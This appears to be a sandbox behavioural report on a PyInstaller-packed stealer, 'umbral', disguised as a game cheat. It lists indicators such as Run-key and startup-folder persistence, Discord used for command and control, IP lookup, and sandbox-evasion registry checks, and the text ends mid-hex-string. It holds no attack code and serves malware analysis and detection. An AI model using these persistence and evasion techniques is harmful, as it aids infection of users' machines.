umbral | 4ce6de7deccb1a06aa6a77ed6efca36fa9bf9dd9a83fa390b011cbba6dc61fc1

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	LUKZI CHEAT 3 DAY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	svOrbEl0.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svOrbEl0.lnk	svOrbEl0.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svOrbEl0.lnk	svOrbEl0.exe

Executes dropped EXE 12 IoCs

pid	Process
1364	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
5036	FMyUS.eXe
4312	VjTDlRoV.exe
3000	svOrbEl0.exe
1824	1ZRs6.EXe
1944	svOrbEl0.exe
3460	winglog32.exe
5572	svOrbEl0.exe
5328	svOrbEl0.exe
2980	svOrbEl0.exe
4588	svOrbEl0.exe

Loads dropped DLL 45 IoCs

pid	Process
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe
1876	LUKZI CHEAT 3 DAY.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svOrbEl0 = "C:\\Users\\Admin\\AppData\\Roaming\\svOrbEl0.exe"	svOrbEl0.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
27	discord.com
36	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
81	ip-api.com

Drops file in System32 directory 13 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1668 set thread context of 396	1668	powershell.EXE	116

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0009000000023c92-6.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FMyUS.eXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1ZRs6.EXe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 63 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1"	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={F8BFD2AA-0BC2-44D7-8910-C23D48C0DD68}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property	mousocoreworker.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1741212240"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000d386185f9dc24b46812a7ced8049b37200000000020000000000106600000001000020000000abfe8d85f7a307d60613e0fe4dd8f7b111db3f6ca60a0423e4cc21a6aabc0fe8000000000e8000000002000020000000f3fb54edbe4e39364210ec313aa26ead7ae212f7cdf6e80e1dd8fc7015cde58b1006000059ab19427af415a0820dbb183907006ca875e97ff2bc95c80a23f393577193594e7c0097eaf16148086fad7b094a2c5e1ca81f738a31516a370e108eaa243c883fbe1b843190fe9ec895d138de6492600a8a8939f808943de4a897830b882cadf70900b493a57170d2328f5acc0ded75bfb54c7b861270cd86763ac6149e8b93f4afc72582a18f023c9e94f9962797dafb3e0d7fd5a7f81b0c5b555708e58c415f793f29e8b973f8ef9537bf10e7562f0d343689bc4add41b8aea9ea8459143c9821f00892132dfd59b9c87a76c2c144654e05f5843baf7fc9759e11ebe2bbb215ac6fa54834dd6299fdfb648895e255c4f98c1d7aa6c44906ee490f479a2d5269c9ed0adace8c08bacabea719008b17b9fe9b101cd62ffe02fb40ad1575d6387cc80a32b39d4fb8c74b632f569c1404d1c6d8cd46075470e36fee1db6551ba149f1fc5f214e8b462be4a6f5d975e3bba3a738f83faf46e9ed5eb44eb5b7b5b8e8fb3a82812a95c325eb51435a7ba1cf27df6835cf8c5937fb38413404e5493f80d5fd9a1a30acc6d790290aab310a04179c427e1d4ac965ee5e9ee95ee7645c9119c8ab59e7bd2f99a540166598f7faa3bfee4f2166fa6b4d10cda0c2620dc7ddbdc62c62637961463b54e65ec0b0b80bfe239dbdc82610b30fca290f8503e33c71aeac24fef9ece3e4ed8967d9015f3be0b3e54eb32890f3b9d542c8418596c92b4e418fb298b708ee73c129625bd6e4480be8921e145d5422eb51112db5036e26e610f39757aa3b1f4eb4c5f7a6a84a1f68d597ae13c8939ae615acfc23d8a92c570bcec694d6c16c8e926a8da779f95da54c3cac8ca115d1be34bd8db222ada20ce701e00bc14dfca849006b8ba22f107283cd33309f9e7bf8846098835dfae1d47dc14046aa5baac083cfb7795635e790c8a6d76ddaf88cfc5e45771e43a0a2225b5a10764f019e8cfbc61635b2c4f2a9bb588bda55d82d2793841dce4d4e33a1f350763d9d3841742fbe0d9504c3106801044a2b4eb59af0c07f172f57d669f4cabf5aa9a6efe625ff8f5dc8412ea38cca30813504d3de6b052c4168f58a90f40dad501d53764c76a2110fce863629b9d9f1f3e359f2c790465dbbf2709227610050f550ed2f8c8188133a8e3c521ac57594858561a357946b8dd60e764a6b423d607026db53bfa0ff51b5c9015f40f33bb68206dd3f02747b4911995dc31c00205b203368925d30da88906c8a0cdf92aea5a473f72cac0782bbac57fb62eca0c3a57a74c99452b0c2cc15fc4a44fa29df00881652b472dd5880a349e2cf59996ed7e7985f31228becb8ef2d136f918fa91fa376a751d4063f3a9ad4b8d0faf62f16def6c44ce62b3ff00ec749b105d596ad131f44c31f87888ee823102067c44d513c6b9ac676c5d93100a3e5708fb39060e5fc86561e4cf267e2c53f769b8548d086ddd2093240e4b2b3c85ee8b7c7cf3e7d804cae801635b6fb5b2f7ab7a1b3b3ceb0b299378f1d6953a0a9c7788ccabb0c2cb38f7e722bbb05cd375350241ccb3351a813fbd9bec4353fa2ad04703c07f38ef1754bd72f81f3539dfedea09efb680df05a0c753c159e3220763be1af805b45b4e58c3f7aec276d49c34d89c4a5a4439e3cef4fb4f72aff784372e1097daddd4f4a27790d6ef0ce7de0d57fd19d4fe9be586cfcefdd60a208502bd43e2da5dca76090fbbcef5a8462f080f066fd1bef9cf8173839a183dd4b014a45d86a71f3d81bfb025dfd0f57fa89bdb5a61cd9b58dc9cd2233eac90d32529c13316c1848afc30ee36ee68c80c91b7a6792c9dee1d5201695ee3dfacec76e9df80abdd2aeebc99086b5a85bebe18c9ebf19f61a14ad05c4057caaace276607aa9e149d878e26b0ec273396630e0312e6d0a6827b5a50e2c8090d9f5e07a98d079cb36bbdb3a75da390c34c322011302067192190e299c6ec3e272230ff0ebb59d09754b7fd859ab5eacdf62db2b327213f529b47aaa984c74965b3ffcb3ef3ac9c5ca0e9245bf3c22c670a7ed1252f767d3583f12b4862af664379936313a478740a9e16b94db894d9e6ec9ff33eb96be95d453265dab82b672966303fa888cfc51d1ea16c6654d84204aa2f97a3dccdb8fc21bb6af40f8947626f49ee6ee86e2e3f89ffcd561122ee636556b7d3275ca463f3c46c36a03b434f1f43eaa40000000fd2b70211765c3a8c31936793c67978870b65d05cfac5643899d81e03700b166c2943523cec062321c685ccb6129a8806c6c5fbd00cfc25fcb838b7b00ad9344	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018C0103724F093 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000d386185f9dc24b46812a7ced8049b372000000000200000000001066000000010000200000008657aea3e7e220f866dcd27463cb209a4a7cecaeabea057a8669600f021c40b7000000000e8000000002000020000000739e24d08de07e19803e0572533af754b045160e8b59481b2981191d5e8aed3280000000bc1a3159cd07048649b44a8628648ffa65d380b7014e7f06b6be0ae95c7304fb58e4d149310da25947971c0ad6cd60e6ea198b4c2f405ee6af3511fe77652bebe2a577d4ac0e7da146d4c9eb401ef810423e57649bc796049fb207cb94d0f2ae8024dfbb3405104f937436ee547bb078dee7093376b8dcbcef59013d8afb7e7c40000000344df362c77efd3d070c7661c635c884c615547757725dba7b1eb25be1b858c2e15303f7b4ffa48a075af1cdb000491161e5e9966b3f391bca5e6256ab188a61	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018C0103724F093"	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 05 Mar 2025 22:04:02 GMT"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}	mousocoreworker.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C0103724F093"	svchost.exe

Modifies registry class 21 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a = ae9e6e801a8edb01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000b501bcd05981db01f20f69801a8edb01f20f69801a8edb01d3de08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000515a4f8420006133396436343361366465333863633936633061633731633530663562303034653430623